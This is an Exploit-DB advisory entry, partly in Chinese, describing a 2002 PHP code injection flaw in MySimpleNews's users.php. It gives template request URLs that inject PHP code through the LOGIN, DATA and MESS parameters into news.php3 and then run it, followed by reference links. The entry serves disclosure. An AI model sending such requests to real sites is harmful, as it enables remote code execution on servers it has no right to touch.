https://www.exploit-db.com/exploits/21900
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-796

MySimpleNews中users.php存在静态代码注入漏洞。远程攻击者借助(1)LOGIN，(2)DATA，和(3)MESS参数注入任意PHP代码和HTML，该漏洞插入news.php3。

source: http://www.securityfocus.com/bid/5865/info

MySimpleNews allows users to enter news articles through a web interface. It will allow PHP code to be injected into URI parameters of the 'users.php' script, which will be stored into a MySimpleNews file (news.php3). The injected code may then be executed by the attacker by requesting the 'news.php3' script.

http://[target]/users.php?LOGIN=[PHP code]

http://[target]/users.php?DATA=[PHP code]

http://[target]/users.php?MESS=[PHP code]

PHP code injected in this manner can be executed with the following request:

http://[target]/news.php3

来源:BID
名称:5865
链接:http://www.securityfocus.com/bid/5865
来源:XF
名称:mysimplenews-users-news-php(10296)
链接:http://www.iss.net/security_center/static/10296.php
来源:BUGTRAQ
名称:20021002MySimpleNews(PHP)
链接:http://archives.neohapsis.com/archives/bugtraq/2002-10/0027.html